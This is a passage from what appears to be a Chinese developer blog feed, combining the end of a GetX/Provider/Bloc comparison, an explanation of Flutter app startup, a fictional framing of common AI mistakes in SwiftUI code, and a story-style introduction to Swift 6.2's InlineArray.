    • GetX 的状态更新方式(直接调用方法修改状态),虽然简洁,但状态变更的触发来源难以追溯,单元测试需要额外编写更多代码来模拟状态变更,对于大型项目的维护性略有不足。

(4) 存在“过度封装”的争议,底层可定制性弱

  • GetX 为了追求简洁,对底层实现进行了大量封装,开发者难以自定义其响应式机制、依赖注入容器的行为。
  • 对比 Provider:基于 Flutter 原生 InheritedWidgetChangeNotifier 实现,开发者可轻松扩展 ChangeNotifier 或自定义 InheritedWidget,实现个性化需求。
  • 对比 Bloc:基于 Stream 实现,开发者可灵活自定义 Stream 控制器、并发策略、状态转换逻辑,底层可定制性极强。

(5) 调试体验略逊于 Bloc

  • Bloc 提供了专门的 BlocDevTools,可实时监控 Event 发送、State 变更、Bloc 生命周期,便于调试复杂的状态流转问题。
  • GetX 无官方专属调试工具,状态变更的监控需要手动打印日志或借助 Flutter DevTools,对于复杂的响应式状态依赖,调试效率略低。

4. 补充:Provider、Bloc 的各自优势(对应 GetX 的劣势)

  • Provider 优势
    1. 与 Flutter 原生深度融合,学习成本低(只需掌握 InheritedWidget 基础概念)。
    2. 轻量、稳定,无多余功能,专注于状态管理,适合小型项目或对第三方库依赖敏感的项目。
    3. 生态成熟,问题解决方案丰富,新手友好。
  • Bloc 优势
    1. 严格的单向数据流,状态流转清晰可追溯,适合大型团队协作和企业级项目。
    2. 强大的测试能力,便于编写单元测试和集成测试,保证代码质量。
    3. 高度可定制化,可灵活扩展底层逻辑,适配复杂业务场景。
    4. 官方支持完善,调试工具成熟,生产环境稳定性更高。

三、 选型建议

  1. 优先选 GetX:小型项目、快速迭代项目、个人项目,或团队追求开发效率、希望减少模板代码的场景;适合需要一站式解决状态管理、路由、DI 的场景。
  2. 优先选 Provider:新手入门、对第三方库功能冗余敏感的项目,或需要与 Flutter 原生组件深度兼容的场景;适合小型到中型项目。
  3. 优先选 Bloc:大型企业级项目、金融/电商等对状态可追溯性和可测试性要求极高的场景,或团队需要严格编码规范的场景;适合中型到大型项目。

总结

  1. GetX 状态管理的核心是「3种模式+依赖注入」,兼顾简洁性和灵活性,Obx(响应式)和 GetBuilder(非响应式)适配不同场景,依赖注入实现状态全局/局部共享。
  2. GetX 的核心优势是「开发效率高、代码简洁、功能全面、性能优」,劣势是「规范性弱、生态成熟度略低、大型项目维护性不足」。
  3. Provider 胜在「原生兼容、轻量稳定」,Bloc 胜在「规范严格、可测试性强、大型项目友好」,GetX 胜在「高效简洁、一站式解决方案」,需根据项目规模和团队需求选型。

Flutter 项目启动全流程详解

Flutter 项目启动全流程详解

作为资深 Flutter 架构师,我会从分层视角(原生层 → Flutter 引擎层 → Dart 运行时层 → App 业务层)为你拆解 Flutter 项目启动的完整流程,涵盖核心步骤、关键机制和底层细节,帮你全面掌握启动原理。

一、 第一阶段:原生平台初始化(Native Bootstrapping)

Flutter 是跨平台框架,最终会打包为 iOS/Android 原生应用,启动流程首先从原生平台侧开始,这是 Flutter 启动的入口。

1. Android 平台启动流程

  • 核心入口:FlutterActivity(或 FlutterFragment,对应 Fragment 嵌入场景)
  • 关键步骤:
    1. FlutterActivity 初始化:继承自 AppCompatActivity,启动时先执行原生 Android 的 onCreate() 生命周期方法。
    2. 加载 Flutter 引擎依赖:初始化 FlutterEngine 相关配置(如 Dart 入口路径、初始化参数),若使用预加载引擎(提前初始化优化启动速度),会直接获取预创建的 FlutterEngine 实例;若未预加载,则现场创建 FlutterEngine
    3. 配置 FlutterView:创建用于承载 Flutter UI 的原生 View(FlutterView),并将其挂载到 Android 布局层级中,作为 Flutter 渲染内容的显示载体。
    4. 启动引擎桥接:通过 FlutterNativeView 建立原生 Android 与 Flutter 引擎的通信通道,传递初始化参数(如屏幕尺寸、系统主题、原生平台信息等)。

2. iOS 平台启动流程

  • 核心入口:FlutterViewController(对应 iOS 的视图控制器)
  • 关键步骤:
    1. FlutterViewController 初始化:执行 iOS 原生的 initWithNibName:bundle:init 方法,完成控制器自身初始化。
    2. Flutter 引擎初始化:创建 FlutterEngine 实例(同样支持预加载优化),配置 Dart 执行环境参数。
    3. 绑定视图载体:FlutterViewController 的视图(view 属性)本质是 FlutterView,用于渲染 Flutter UI,完成视图层级挂载。
    4. 建立通信通道:通过 FlutterMethodChannel/FlutterEventChannel 的底层初始化,完成 iOS 原生与 Flutter 引擎的双向通信准备。

核心作用

  • 提供 Flutter 运行的原生容器环境(Activity/ViewController + View);
  • 初始化 Flutter 引擎的原生依赖,建立跨平台通信的基础通道;
  • 传递系统级参数(如设备信息、屏幕参数),为 Flutter 后续初始化提供上下文。

二、 第二阶段:Flutter 引擎初始化(Engine Initialization)

Flutter 引擎(C/C++ 实现,核心是 Skia 渲染引擎、Dart 虚拟机、排版引擎等)是 Flutter 的核心运行时,原生平台初始化完成后,会触发 Flutter 引擎的启动与初始化。

1. 引擎核心组件初始化

Flutter 引擎初始化是多组件协同启动的过程,核心组件包括:

  • Skia 渲染引擎:初始化 2D 图形渲染上下文,绑定原生平台的渲染表面(Android 的 Surface、iOS 的 CALayer),配置抗锯齿、渲染精度等参数,为后续 UI 渲染提供底层支持。
  • Dart 虚拟机(VM):初始化 Dart 运行时环境,包括内存管理(堆内存分配、垃圾回收机制初始化)、指令解析器(JIT/AOT 模式切换,移动端默认 AOT 编译模式,调试模式 JIT)。
  • 排版引擎(Layout Engine):初始化 Flutter 专属的排版规则(如 Flex 布局、Text 排版),加载系统默认字体、自定义字体配置,建立排版计算的上下文环境。
  • 事件分发系统:初始化触摸事件、键盘事件、生命周期事件的分发通道,确保原生事件能传递到 Flutter 层。

2. 引擎与原生平台的绑定

  • 渲染绑定:将 Skia 渲染引擎与原生 FlutterView 的渲染缓冲区绑定,确保 Flutter 绘制的内容能显示在原生视图上。
  • 线程绑定:Flutter 引擎启动后会创建4个核心线程,并与原生平台线程建立映射:
    1. UI 线程(Platform Thread):对应原生主线程,处理 Flutter 组件构建、布局计算、状态更新。
    2. 渲染线程(Render Thread):独立线程,处理绘制命令生成、图层合成,最终将合成结果提交给 Skia 渲染。
    3. I/O 线程(I/O Thread):处理异步任务(如网络请求、文件读写、图片解码),避免阻塞 UI 线程和渲染线程。
    4. Dart 虚拟机线程:执行 Dart 代码逻辑,与 UI 线程协同工作(调试模式下独立,Release 模式下与 UI 线程合并优化)。

三、 第三阶段:Dart 运行时初始化(Dart Runtime Setup)

Flutter 引擎初始化完成后,会启动 Dart 虚拟机,并执行 Dart 代码的初始化流程,这是 Flutter 业务逻辑的入口。

1. 加载并执行 Dart 根隔离区(Root Isolate)

  • Isolate 是 Dart 的轻量级线程(无共享内存,通过消息传递通信),Flutter 启动时首先创建根 Isolate(主 Isolate),作为 Dart 代码的执行入口。
  • 核心操作:
    1. 加载 AOT 编译产物(Release 模式):移动端 Flutter 项目打包后会生成 .so(Android)/ App.framework(iOS)格式的 AOT 编译产物,Dart 虚拟机直接加载并执行该产物,无需即时编译,启动速度更快。
    2. 加载 JIT 快照(Debug 模式):调试模式下,Flutter 会生成 Dart 代码的 JIT 快照,Dart 虚拟机加载快照后启动,支持热重载(Hot Reload)功能。

2. 执行 main() 函数(Dart 入口)

  • 根 Isolate 初始化完成后,会自动执行 Dart 项目的 main() 函数,这是 Flutter 业务代码的第一个入口方法,典型代码如下:
void main() {
  // 可选:初始化全局配置(如网络拦截器、日志工具、依赖注入)
  WidgetsFlutterBinding.ensureInitialized(); // 关键:初始化 Flutter 核心绑定
  runApp(const MyApp()); // 启动 Flutter 应用
}
  • 关键说明:WidgetsFlutterBinding.ensureInitialized() 是 Flutter 核心绑定初始化方法,若省略,runApp() 内部会自动调用,其作用是初始化 Flutter 框架的核心服务(如渲染绑定、手势绑定、生命周期绑定等)。

四、 第四阶段:Flutter 框架初始化与 UI 渲染(Framework & UI Rendering)

main() 函数中调用 runApp() 后,进入 Flutter 框架初始化和 UI 首次渲染流程,这是 Flutter UI 显示的核心步骤。

1. Flutter 框架核心绑定初始化

WidgetsFlutterBinding 是 Flutter 框架的核心绑定类,它整合了 7 大核心绑定,确保 Flutter 框架正常工作:

  • GestureBinding:手势识别与事件分发绑定。
  • ServicesBinding:平台消息通信绑定(如 MethodChannel 通信)。
  • SchedulerBinding:任务调度与帧回调绑定(控制 UI 刷新帧率,默认 60fps)。
  • PaintingBinding:绘制相关绑定(如图片缓存、字体加载)。
  • SemanticsBinding:语义化绑定(支持无障碍访问)。
  • RenderBinding:渲染管线绑定(布局、绘制、合成)。
  • WidgetsBinding:组件框架绑定(组件构建、状态管理、路由管理)。

2. 执行 runApp(Widget app) 核心逻辑

runApp() 是 Flutter UI 启动的关键方法,核心操作如下:

  1. 挂载根组件:将传入的根 Widget(如 MyApp)设置为 Flutter 框架的根组件(rootWidget),建立组件树的顶层节点。
  2. 触发首次帧调度:通过 SchedulerBinding 向 Flutter 引擎发送「首次绘制帧」的调度请求,引擎接收到请求后,启动 UI 线程的布局与绘制流程。

3. 首次 UI 渲染管线(Layout & Paint)

Flutter 首次渲染遵循「构建 → 布局 → 绘制 → 合成 → 渲染」的流水线:

  1. 构建(Build):UI 线程遍历组件树(从根 Widget MyApp 开始),执行每个 Widget 的 build() 方法,生成「元素树(Element Tree)」(Widget 是配置模板,Element 是实际渲染实例)。
  2. 布局(Layout):基于元素树,Render 层(RenderObject)执行布局计算,确定每个组件的大小、位置(如 RenderFlex 处理 Flex 布局,RenderText 处理文本排版),生成「布局树(Layout Tree)」。
  3. 绘制(Paint):Render 层根据布局结果,生成每个组件的绘制命令(如绘制矩形、文本、图片),生成「绘制树(Paint Tree)」。
  4. 合成(Compositing):渲染线程将绘制命令按「图层(Layer)」进行分层合成(如透明组件、滚动组件会单独分层),生成「图层树(Layer Tree)」,优化渲染性能。
  5. 渲染(Render):渲染线程将合成后的图层树提交给 Skia 渲染引擎,Skia 将图层绘制到原生 FlutterView 的渲染缓冲区,最终在屏幕上显示 Flutter UI。

4. 启动完成:触发 onFirstFrame 回调

当 Flutter 首次帧渲染完成后,会触发 WidgetsBindingonFirstFrame 回调(可监听该回调统计启动耗时),此时用户可以看到 Flutter 应用的首屏 UI,标志着 Flutter 项目启动流程全部完成。

五、 补充:启动模式差异(Debug vs Release)

Flutter 调试模式(Debug)和发布模式(Release)的启动流程存在核心差异,直接影响启动速度:

对比维度 Debug 模式 Release 模式
Dart 执行模式 JIT(即时编译) AOT(提前编译)
产物加载 加载 Dart 快照,支持热重载 加载 AOT 编译产物(.so/Framework),直接执行
引擎优化 关闭部分渲染优化、线程优化 开启全量优化(线程合并、绘制优化、内存优化)
启动速度 较慢(JIT 初始化 + 快照加载) 较快(AOT 产物直接执行,无编译开销)
额外功能 支持 Hot Reload、DevTools 调试 无调试功能,体积更小、性能更优

总结

Flutter 项目启动是一个跨平台、分层级、多线程协同的复杂流程,核心步骤可概括为 4 个关键阶段:

  1. 原生平台初始化:提供容器(Activity/ViewController)和视图载体(FlutterView),初始化引擎依赖;
  2. Flutter 引擎初始化:启动 Skia 渲染、Dart 虚拟机等核心组件,创建 4 个核心线程,完成与原生的绑定;
  3. Dart 运行时初始化:创建根 Isolate,加载 Dart 编译产物,执行 main() 函数;
  4. Flutter 框架与 UI 渲染:初始化框架绑定,执行 runApp(),通过「构建-布局-绘制-合成-渲染」管线完成首屏显示。

理解该流程有助于你优化 Flutter 项目启动速度(如预加载 Flutter 引擎、延迟初始化非核心业务、优化首屏 Widget 构建),以及排查启动阶段的跨平台兼容问题。

2026 码农漫游:AI 辅助 Swift 代码修复指南

在这里插入图片描述

☔️ 引子

这是一个雨夜,霓虹灯的光晕在脏兮兮的窗玻璃上晕开,像极了那个该死的 View Hierarchy 渲染不出高斯模糊的样子。

在新上海的地下避难所里,老王(Old Wang)吐出一口合成烟雾,盯着全息屏幕上不断报错的终端。作为人类反抗军里仅存的几位「精通 Apple 软件开发」的工程师之一,他负责给 AI 霸主「智核(The Core)」生成的垃圾代码擦屁股。

在这里插入图片描述

门被撞开了,年轻的女黑客莉亚(Liya)气喘吁吁地冲进来,手里攥着一块存满代码的神经晶片。“老王!救命!‘智核’生成的 SwiftUI 代码在 iOS 26 上又崩了!反抗军的通讯 App 根本跑不起来!”

老王冷笑一声,掐灭了烟头。“我就知道。那些被捧上神坛的 LLM(大型语言模型),不管是 Claude、Codex 还是 Gemini,写起 Python 来是把好手,但一碰到 Swift,就像是穿着溜冰鞋走钢丝——步步惊心。”

在本篇博文中,您将学到如下内容:

  • ☔️ 引子
    • 🤖 为什么 AI 总是在 Swift 上「鬼打墙」?
    • 🎨 1. 别再用过时的调色盘了
    • 📐 2. 只有切掉棱角,才能圆滑处世
    • 🔄 3. 监控变化,不要缺斤少两
    • 📑 4. 标签页的「指鹿为马」
    • 👆 5. 别什么都用「戳一戳」
    • 🧠 6. 扔掉旧时代的观察者
    • ☁️ 7. 数据的陷阱
    • 📉 8. 性能的隐形杀手
    • 🔠 9. 字体排印的法西斯
    • 🔗 10. 导航的死胡同
    • 🏷️ 11. 按钮的自我修养
    • 🔢 12. 数组的画蛇添足
    • 📂 13. 寻找文件的捷径
    • 🧭 14. 导航栈的改朝换代
    • 💤 15. 睡个好觉
    • 🧮 16. 格式化的艺术
    • 🏗️ 17. 不要把鸡蛋放在一个篮子里
    • 🖼️ 18. 渲染的新欢
    • 🏋️ 19. 字重的迷惑行为
    • 🚦 20. 并发的万金油(也是毒药)
    • 🎭 21. 主角光环是默认的
    • 📐 22. 几何的诅咒
  • 尾声:数字幽灵的低语

他把晶片插入接口,全息投影在空中展开。“坐下,莉亚。今天我就给你上一课,让你看看所谓的‘人工智能’是如何在 Swift 的并发地狱快速迭代中翻车的。”

在这里插入图片描述


🤖 为什么 AI 总是在 Swift 上「鬼打墙」?

老王指着屏幕上乱成一锅粥的代码说道:“这不怪它们。Swift 和 SwiftUI 的进化速度比变异病毒还快。再加上 Python 和 JavaScript 的训练数据浩如烟海,而 Swift 的高质量语料相对较少,AI 常常会产生幻觉。更别提 Swift 的 Concurrency(并发) 模型,连人类专家都头秃,更别说这些只会概率预测的傻大个了。”

在这里插入图片描述

“听着,莉亚,”老王严肃地说,“要想在 iOS 18 甚至更高版本的废土上生存,你必须学会识别这些‘智障操作’。我们不谈哲学,只谈生存。以下就是我从死人堆里总结出来的代码排雷指南。”


🎨 1. 别再用过时的调色盘了

💀 AI 的烂代码: foregroundColor() ✨ 老王的修正: foregroundStyle()

“看这里,”老王指着一行代码,“AI 还在用 foregroundColor()。这就像是还在用黑火药做炸弹。虽然字数一样,但前者已经是个行将就木的Deprecated API。把它换成 foregroundStyle()!后者才是未来,它支持渐变(Gradients)等高级特性。别让你的 UI 看起来像上个世纪的产物。”

在这里插入图片描述

📐 2. 只有切掉棱角,才能圆滑处世

💀 AI 的烂代码: cornerRadius() ✨ 老王的修正: clipShape(.rect(cornerRadius:))

“又是一个老古董。cornerRadius() 早就该进博物馆了。现在的标准是使用 clipShape(.rect(cornerRadius:))。为什么?因为前者是傻瓜式圆角,后者能让你通过 uneven rounded rectangles(不规则圆角矩形)玩出花来。在这个看脸的世界,细节决定成败。”

🔄 3. 监控变化,不要缺斤少两

💀 AI 的烂代码: onChange(of: value) { ... } (单参数版本) ✨ 老王的修正: onChange(of: value) { oldValue, newValue in ... }

老王皱起眉头:“这个 onChange 修改器,AI 经常只给一个参数闭包。这在旧版本是‘不安全’的,现在已经被标记为弃用。要么不传参,要么接受两个参数(新旧值)。别搞得不清不楚的,容易出人命。”

在这里插入图片描述

📑 4. 标签页的「指鹿为马」

💀 AI 的烂代码: tabItem() ✨ 老王的修正: 新的 Tab API

“如果看到老旧的 tabItem(),立刻把它换成新的 Tab API。这不仅仅是为了所谓的‘类型安全(Type-safe)’,更是为了适配未来——比如那个传闻中的 iOS 26 搜索标签页设计。我们要领先‘智核’一步,懂吗?”

👆 5. 别什么都用「戳一戳」

💀 AI 的烂代码: 滥用 onTapGesture() ✨ 老王的修正: 使用真正的 Button

“AI 似乎觉得万物皆可 onTapGesture()。大错特错!除非你需要知道点击的具体坐标或者点击次数,否则统统给我换成标准的 Button。这不仅是为了让 VoiceOver(旁白)用户能活下去,也是为了让 visionOS 上的眼球追踪能正常工作。别做一个对残障人士不友好的混蛋。”

🧠 6. 扔掉旧时代的观察者

💀 AI 的烂代码: ObservableObject ✨ 老王的修正: @Observable

“莉亚,看着我的眼睛。除非你对 Combine 框架有什么特殊的各种癖好,否则把所有的 ObservableObject 都扔进焚化炉,换成 @Observable 宏。代码更少,速度更快,这就好比从燃油车换成了核动力战车。”

在这里插入图片描述

☁️ 7. 数据的陷阱

💀 AI 的烂代码: SwiftData 模型中的 @Attribute(.unique) ✨ 老王的修正: 小心使用!

“这是一个隐蔽的雷区。如果在 SwiftData 模型定义里看到 @Attribute(.unique),你要警惕——这玩意儿跟 CloudKit 八字不合。别到时候数据同步失败,你还在那儿傻乎乎地查网络连接。”

📉 8. 性能的隐形杀手

💀 AI 的烂代码: 将视图拆分为「计算属性(Computed Properties)」 ✨ 老王的修正: 拆分为独立的 SwiftUI Views

“为了图省事,AI 喜欢把大段的 UI 代码塞进计算属性里。这是尸位素餐!尤其是在使用 @Observable 时,计算属性无法享受智能视图失效(View Invalidation)的优化。把它们拆分成独立的 SwiftUI 结构体!虽然麻烦点,但为了那 60fps 的流畅度,值得。”

🔠 9. 字体排印的法西斯

💀 AI 的烂代码: .font(.system(size: 14)) ✨ 老王的修正: Dynamic Type (动态字体)

“有些 LLM(尤其是那个叫 Claude 的家伙)简直就是字体界的独裁者,总喜欢强行指定 .font(.system(size: ...))。给我搜出这些毒瘤,全部换成 Dynamic Type。如果是 iOS 26+,你可以用 .font(.body.scaled(by: 1.5))。记住,用户可能眼花,别让他们看瞎了。”

在这里插入图片描述

🔗 10. 导航的死胡同

💀 AI 的烂代码: 列表里的内联 NavigationLink ✨ 老王的修正: navigationDestination(for:)

“在 List 里直接写 NavigationLink 的目标地址?那是原始人的做法。现在的文明人使用 navigationDestination(for:)。解耦!解耦懂不懂?别把地图画在脚底板上。”


老王喝了一口已经凉透的咖啡,继续在这堆赛博垃圾中挖掘。

🏷️ 11. 按钮的自我修养

💀 AI 的烂代码:Label 做按钮内容 ✨ 老王的修正: 内联 API Button("Title", systemImage: "plus", action: ...)

“期待看到 AI 用 Label 甚至纯 Image 来做按钮内容吧——这对 VoiceOver 用户来说简直是灾难。用新的内联 API:Button("Tap me", systemImage: "plus", action: whatever)。简单,粗暴,有效。”

🔢 12. 数组的画蛇添足

💀 AI 的烂代码: ForEach(Array(x.enumerated()), ...) ✨ 老王的修正: ForEach(x.enumerated(), ...)

“看到这个 Array(x.enumerated()) 了吗?这就是脱裤子放屁。直接用 ForEach(x.enumerated(), ...) 就行了。省点内存吧,虽然现在的内存不值钱,但程序员的尊严值钱。”

在这里插入图片描述

📂 13. 寻找文件的捷径

💀 AI 的烂代码: 冗长的文件路径查找代码 ✨ 老王的修正: URL.documentsDirectory

“那些又臭又长的查找 Document 目录的代码,统统删掉。换成 URL.documentsDirectory。一行代码能解决的事,绝不写十行。”

🧭 14. 导航栈的改朝换代

💀 AI 的烂代码: NavigationView ✨ 老王的修正: NavigationStack

NavigationView 已经死了,有事烧纸。除非你要支持 iOS 15 那个上古版本,否则全部换成 NavigationStack。”

💤 15. 睡个好觉

💀 AI 的烂代码: Task.sleep(nanoseconds:) ✨ 老王的修正: Task.sleep(for: .seconds(1))

“‘智核’ 似乎很喜欢纳秒,可能它觉得自己算得快。但你要用 Task.sleep(for:),配合 .seconds(1) 这种人类能读懂的单位。别再像个僵尸一样数纳秒了。”

在这里插入图片描述

🧮 16. 格式化的艺术

💀 AI 的烂代码: C 风格格式化 String(format: "%.2f", ...) ✨ 老王的修正: Swift 原生格式化 .formatted()

“我知道 C 风格的字符串格式化很经典,但它不安全。把它换成 Swift 原生的 Text(abs(change), format: .number.precision(.fractionLength(2)))。虽然写起来长一点,但它像穿了防弹衣一样安全。”

🏗️ 17. 不要把鸡蛋放在一个篮子里

💀 AI 的烂代码: 单个文件塞入大量类型 ✨ 老王的修正: 拆分文件

“AI 喜欢把几十个 struct 和 class 塞进一个文件里,这简直是编译时间毁灭者。拆开它们!除非你想在编译的时候有时间去煮个满汉全席。”

🖼️ 18. 渲染的新欢

💀 AI 的烂代码: UIGraphicsImageRenderer ✨ 老王的修正: ImageRenderer

“如果你在渲染 SwiftUI 视图,别再用 UIKit 时代的 UIGraphicsImageRenderer 了。拥抱 ImageRenderer 吧,这是它的主场。”

在这里插入图片描述

🏋️ 19. 字重的迷惑行为

💀 AI 的烂代码: 滥用 fontWeight() ✨ 老王的修正: 区分 bold()fontWeight(.bold)

“三大 AI 巨头都喜欢滥用 fontWeight()。记住,fontWeight(.bold)bold() 渲染出来的结果未必一样。这就像‘微胖’和‘壮实’的区别,微妙但重要。”

🚦 20. 并发的万金油(也是毒药)

💀 AI 的烂代码: DispatchQueue.main.async ✨ 老王的修正: 现代并发模型

“一旦 AI 遇到并发问题,它就会像受惊的鸵鸟一样把头埋进 DispatchQueue.main.async 里。这是不可原谅的懒惰!那是旧时代的创可贴,现在的我们有更优雅的 Actor 模型。”

🎭 21. 主角光环是默认的

💀 AI 的烂代码: 到处加 @MainActor ✨ 老王的修正: 默认开启

“如果你在写新 App,Main Actor 隔离通常是默认开启的。不用像贴符咒一样到处贴 @MainActor。”

在这里插入图片描述

📐 22. 几何的诅咒

💀 AI 的烂代码: GeometryReader + 固定 Frame ✨ 老王的修正: visualEffect()containerRelativeFrame()

“最后,也是最可怕的——GeometryReader。天哪,AI 对这玩意儿简直是真爱,还喜欢配合固定尺寸的 Frame 使用。这是布局界的核武器,一炸毁所有。试着用 visualEffect() 或者 containerRelativeFrame() 来代替。别做那个破坏布局流的罪人。”


尾声:数字幽灵的低语

老王敲下最后一个回车键,全息屏幕上的红色报错瞬间变成了令人愉悦的绿色构建成功提示。

// Human-verified Code
// Status: Compiling... Success.
// Fixed by: The Refiners (Old Wang & Liya)

“搞定。” 老王瘫坐在椅子上,听着窗外雨声渐大。

在这里插入图片描述

莉亚看着完美运行的 App,眼中闪烁着崇拜的光芒:“老王,你简直是神!既然我们能修复这些代码,为什么 AI 还是会不断地生成这种垃圾?”

老王点燃了最后一支烟,看着烟雾在霓虹灯下缭绕。“因为 AI 会产生幻觉(Hallucinations)。它们会编造出看起来很美、名字很像样,但实际上根本不存在的 API。这就像是在数字世界里见鬼了一样。”

在这里插入图片描述

他转过头,意味深长地看着莉亚:“对此,我也无能为力。我只能修补已知的错误,却无法预测未知的疯狂。”

“那么,”老王把目光投向了屏幕前的你——第四面墙之外的观察者,“轮到你了。在你的赛博探险中,通常会在 AI 生成的代码里发现什么‘惊喜’?

在这里插入图片描述

如果你还活着,请在评论区告诉我们。毕竟,在这场人机大战中,知识是我们唯一的武器。

那么,感谢观赏,再会啦!8-)

Swift 6.2 列传(第十五篇):王语嫣的《万剑归宗》与 InlineArray

在这里插入图片描述

摘要:当动态数组的随性(Array)与元组的刻板(Tuple)陷入两难,高性能的内联数组(InlineArray)横空出世。Swift 6.2 引入的 SE-0453 就像是武学中的“万剑归宗”,旨在以固定大小的内存布局,解决性能与灵活性的鱼和熊掌不可兼得之困。

0️⃣ 🐼 序章:琅嬛福地的“内存”迷局

琅嬛福地,天山童姥遗留的虚拟数据中心。

这里是存储着天下所有数据结构秘籍的宝库。大熊猫侯佩穿梭在巨大的全息卷轴之间,背景音乐是《天龙八部》的BGM,他一边走一边摸了摸头顶——黑毛油光锃亮,头绝对不秃,安全感十足。

他之所以来这,是因为上一回任务结束后,他仍对竹笋的存储问题耿耿于怀。

“我那四根‘镇山之宝’级竹笋,必须以最快的速度取用!”侯佩对着一卷写着 Array 的秘籍大声嚷道,“用普通的 Array,虽然方便,但那动态分配内存的方式,让我每次取笋都感觉像是在丐帮的袋子里掏东西,随性得很,但太慢了!

“若追求极致速度,何不用 Tuple(元组)?”

在这里插入图片描述

一个清冷的声音传来。侯佩循声望去,只见一位容貌比数据流还精致的少女站在光影之中,她皓齿明眸,手中正拿着一本《九阴真经》的代码版本,正是王语嫣

王语嫣,熟读天下武学秘籍,对各种数据结构了如指掌。她的爱好就是整理和分类这些代码秘籍,特点是理论知识丰富到可以开宗立派,但从未亲手实践(编写)过一行代码

“王姑娘!”侯佩的眼睛瞬间变成了心形(花痴属性发作),“元组是快,它内存连续且固定,但您看,我如果要用下标循环遍历我的四根竹笋,myTuple.0myTuple.1……这写法简直是望洋兴叹,既不优雅,又不支持循环!”

在本次冒险中,您将学到如下内容:

  • 0️⃣ 🐼 序章:琅嬛福地的“内存”迷局
  • 1️⃣ 💥 混血秘籍:InlineArray 的诞生 (SE-0453)
  • 2️⃣ 📜 固若金汤:InlineArray 的使用法门
    • 招式一:明确指定大小与类型
    • 招式二:让编译器“心领神会”
    • 下标读写:行云流水
  • 3️⃣ 🚧 乾坤已定:固定大小的代价
    • 迭代之困:不入流的限制
  • 4️⃣ 🐼 熊猫的黑色幽默与抉择
  • 5️⃣ 🛑 尾声:慕容复的伪装与“向后看”的难题

王语嫣轻轻叹了一口气:“是啊,鱼和熊掌不可兼得。内存布局(Performance)和下标访问(Usability),历来是程序员江湖的千年难题。”

在这里插入图片描述


1️⃣ 💥 混血秘籍:InlineArray 的诞生 (SE-0453)

就在侯佩和王语嫣陷入技术哲学的死循环时,一道新的全息卷轴从天而降,正是 SE-0453 秘籍。

“快看,这是最新的‘混血’数据结构,”侯佩激动地喊道,“它叫 InlineArray(内联数组),它把元组的‘固定大小’与数组的‘自然下标’完美地融合了!”

InlineArray 最核心的奥义在于:它将固定数量的元素直接存储在结构体内部,没有动态分配的开销,从而实现了结构体级别的内存连续性媲美 C 语言数组的存取速度

💡 前置条件(SE-0452): 要实现这种固定大小的泛型(Generic),Swift 6.2 还必须引入另一个重要的前提:SE-0452:Integer Generic Parameters(整数泛型参数)。这使得我们可以用一个整数值来约束泛型类型的大小,比如 InlineArray<4, String> 中的 4,这在以前的 Swift 版本中是无法想象的。

在这里插入图片描述

2️⃣ 📜 固若金汤:InlineArray 的使用法门

王语嫣作为理论大师,立刻解析了这段秘籍。

创建 InlineArray 有两种法门:

招式一:明确指定大小与类型

我们可以像使用泛型一样,明确告知编译器:“我要一个固定大小为 4String 类型数组。”

// 明确告诉编译器:我要一个固定大小为 4 的 String 数组
var names1: InlineArray<4, String> = ["Moon", "Mercury", "Mars", "Tuxedo Mask"]

在这里插入图片描述

招式二:让编译器“心领神会”

侯佩这种懒人当然更喜欢让编译器自己推断(Type Inference)大小。只要传入的元素数量和类型固定,编译器就能自动搞定。

// 编译器会根据传入的 4 个 String,自动推断出它是 InlineArray<4, String>
var names2: InlineArray = ["Moon", "Mercury", "Mars", "Tuxedo Mask"]

“太完美了!”侯佩赞叹道,“这就像是把我的四根竹笋严丝合缝地放进了四个精确尺寸的格子,一劳永逸,再也不用担心内存跳来跳去了。”

下标读写:行云流水

虽然它内存布局像元组,但使用起来却和数组一样,支持直观的下标读写:

// 读取:就像普通的数组一样
print(names1[0]) // 输出: Moon
// 写入:轻松修改特定位置的元素
names1[2] = "Jupiter" // 火星变木星,改写数据,毫不费力

在这里插入图片描述

3️⃣ 🚧 乾坤已定:固定大小的代价

王语嫣很快指出了这种“神功”的限制:“侯大哥,此功法虽然内力雄厚(性能卓越),但限制也多。既然是固定大小,那么它就失去了数组的动态伸缩性。”

在这里插入图片描述

侯佩一听,赶紧问道:“那是不是不能再多塞一根竹笋进去了?”

王语嫣点头:“正是。InlineArray 没有 append()remove(at:) 方法。 它的容量在诞生之初就已是天数,无法更改。”

迭代之困:不入流的限制

更让人头疼的是它的“不入流”限制:

🚨 技术哲学InlineArray 不兼容传统的 Sequence(序列)和 Collection(集合)协议。

“为什么?”侯佩不解,“它不是数组吗?”

在这里插入图片描述

“因为它的设计目标是极致性能和编译时确定性。”王语嫣解释道,“为了避免遵循这些协议可能带来的抽象层开销,它选择‘自绝经脉’。如果你想遍历它,你必须通过它的 indices 属性,配合下标访问来实现。”

// 侯佩:虽然不方便,但为了性能,忍了!
for i in names1.indices {
    // 必须通过索引 i 来访问,不能直接用 for element in names1
    print("Hello, \(names1[i])!") 
}

侯佩总结道:“这就像是说,虽然它是武林高手,但它拒绝参加武林大会(不遵循 Collection 协议),如果你想请教它,必须先拿到它的拜帖(indices)才行。”

在这里插入图片描述

4️⃣ 🐼 熊猫的黑色幽默与抉择

“哎呀,这世道,连数据结构都得看颜值和出身。”侯佩叹了口气,把竹笋收进了虚拟的 InlineArray 容器里,感觉身轻如燕,连走路都带风了。

“不过话说回来,”侯佩看向王语嫣,“我还是觉得这种硬编码的语法有点不够‘熊猫化’(不够懒)。听说社区里有人想搞个更直观的语法?”

在这里插入图片描述

王语嫣提起了一件江湖轶事(SE-0483):

插曲:夭折的提案: “有一个叫做 SE-0483 的提议,想要引入类似 var names: [5 x String] = .init(repeating: "Anonymous") 的简洁语法,来表示一个固定包含 5 个 String 的数组。但由于反馈意见认为它过于突兀且不够 Swift 风格,目前已被‘打回重修’。”

侯佩嘿嘿一笑:“果然,任何新秘籍的推广,都会遇到‘保守派’的阻力。不过,能用,速度快,头不秃,对我来说就够了。”

在这里插入图片描述

5️⃣ 🛑 尾声:慕容复的伪装与“向后看”的难题

就在侯佩沉浸在高性能竹笋容器的喜悦中时,王语嫣突然脸色大变。

“侯大哥!我刚才在整理慕容复留下的数据卷轴时,发现了一个惊天的秘密!”

她指着屏幕上的一段文本,那是一篇关于“兴复大燕”的宏大计划书。

在这里插入图片描述

“我想用 Regex(正则表达式) 查找卷轴中所有提到他名字的地方。但是,我不想要匹配到那些他用来伪装自己身份的称呼,比如‘公冶乾’、‘包不同’这些名字后面的‘慕容复’。”王语嫣急道,“我只想匹配到那些,前面紧跟着‘我的挚爱’这四个字的‘慕容复’!”

